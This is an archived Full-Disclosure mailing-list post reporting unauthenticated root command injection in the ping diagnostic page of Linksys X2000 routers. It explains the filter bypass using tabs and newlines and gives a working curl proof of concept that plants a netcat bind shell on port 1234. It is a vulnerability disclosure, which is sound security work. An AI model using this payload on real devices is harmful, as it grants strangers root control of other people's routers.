lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 1 Nov 2015 21:51:27 +0100
From: Lorenzo Pistone <blaffablaffa@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Unauthenticated remote command execution on Cisco Linksys
 x2000 routers

Hello,
I have found on my router, a Linksys X2000, that there is a poor 
validation of the IP target in the ping diagnostics web page 
(http://$router_ip/Diagnostics.asp). This can be used to execute 
arbitrary commands as the root user on the device. It appears that there 
is no need for authentication to exploit the flaw, so this is 
exploitable from WAN if the administrator has activated remote 
management from the web UI.

The web interface is managed by process /bin/httpd. The diagnostic web 
pages accepts an user-supplied IP to run a ping test on it. This user 
value is truncated at the first occurrence of the characters " ;<>" in 
an attempt to make the user-provided string safe when appended to 
"/bin/ping " and passed to system(). However, this is not sufficient at 
all to prevent the injection of shell commands. In fact, spaces for 
arguments separation can be replaced by tabs and semicolons with new 
lines. This allows arbitrary remote command execution with root privileges.

To exacerbate the issue, it appears that there is no need for any 
authentication to trigger the ping diagnostic. I have tested this on LAN 
and it works. Regarding remote access, I failed to get remote access to 
work at all, because for some reason when I enable it a rule to the nat 
table is inserted to drop packets directed to the web interface, before 
the rule that honors the "Remote Management Port" field in the web 
configuration. I do not know why this happens and if it is intended 
behavior. However, by using the root shell from LAN to remove this 
iptables entry, I could successfully exploit the flaw from WAN too.

This is the POC:

    #activate the shellby requesting a ping test to a special ip string
    ("busybox nc -e /bin/sh -l -p 1234")
    curl -s \
       --data submit_button=Diagnostics \
       --data change_action=gozila_cgi \
       --data submit_type=start_ping \
       --data action= \
       --data commit=0 \
       --data nowait=1 \
       --data ping_size=32 \
       --data ping_times=5 \
       --data-urlencode
    ping_ip=$'\nbusybox\tnc\t-e\t/bin/sh\t-l\t-p\t1234'
    $router_ip/apply.cgi >/dev/null &
    #access the shell
    nc $router_ip 1234
    #now can execute any non-interactive shell command

I suspect that there are similar issues with the traceroute diagnostic, 
and in adding port forwarding entries. A more blog-y description of the 
issue, including the assembly locations that fail to properly sanitize 
the user value, can be found here 
http://meat.pisto.horse/2015/11/rooting-linksys-x2000-router-system.html

Cheers.
Lorenzo Pistone

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ